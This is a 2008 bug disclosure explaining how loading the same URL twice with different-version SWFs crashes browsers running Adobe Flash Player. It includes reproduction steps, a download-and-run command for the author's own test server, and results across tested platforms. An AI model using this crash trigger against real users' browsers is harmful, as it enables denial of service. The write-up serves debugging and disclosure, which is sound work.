The below explanation was written in October 2008, while I was an engineer at Mochi Media.
If a Flash 9 SWF loads the same URL twice with the first returning a Flash 7 SWF and the second time returning a Flash 8 SWF (or vice-versa), the Adobe Flash Player plug-in will attempt to dereference a null pointer, crashing the browser.
Using the server included with the sample code below, HTTP requests
for / returns a Flash 9 SWF that uses
flash.display.Loader to load two instances of
/b. HTTP requests for /b alternatingly
return an empty SWF compiled for Flash 7 or Flash 8.
This example only uses GET requests, but POST requests also work.
The URL (including query string arguments) must be the same for both
requests to /b, but POST requests may use different
request entities.
There's seemingly nothing special about 7 and 8, except that 7 ≠ 8. E.g., compiling for any distinct pair of versions 6, 7, and 8 instead of 7 and 8 also result in crashes. The first request can also instead return an image file supported by Flash such as a PNG or JPEG.
Download the sample code here. This zip file includes a simple web server written in Python that has been tested to work correctly on OS X 10.5.4 and 10.5.5 but is expected to work on any system with Python 2.5.
Download, unzip, and start the server by running:
$ curl -O http://flashcrash.dempsky.org/flashcrash-20080919.zip $ unzip flashcrash-20080919.zip $ cd flashcrash-20080919 $ python flashcrash.py
The server will listen on port 8080. While the server is running, open http://127.0.0.1:8080/ in a browser using the Adobe Flash Player plug-in. Within a few seconds, the entire browser should crash.
This code has been tested with Safari 3.1.2 and Firefox 3.0.1 with Adobe's Flash Player plug-in 9.0.115.0, 9.0.124.0, and 10.0.12.10 on OS X 10.5.4 and 10.5.5.
This code has also been tested with Internet Explorer 6.0 and 7.0, Firefox 3.0.1, and Chrome 0.2.149.30 with Adobe's Flash Player plug-in 9.0.45.0 and 9.0.124.0 on Windows XP Professional SP2. In Chrome tests, only one tab failed. In one IE7 test, the browser became completely unresponsive and needed a reboot to resolve, but we could not reproduce this.
This code has also been tested with Firefox 3.0.1 with Adobe's Flash Player plug-in 9.0.124.0 on Ubuntu 8.04 on amd64. On this platform, the Flash Player plug-in runs in a separate process (under nspluginwrapper) so only that process crashes instead of the entire browser.
One of our users, Jared, reported a problem where his Flash game would crash his browser. One of our engineers, Moshen Chan, reproduced the issue Jared reported and found a simple work-around (appending a varying query string to every request). Another of our engineers, Matthew Dempsky, further simplified Moshen's test case into the above description and sample code.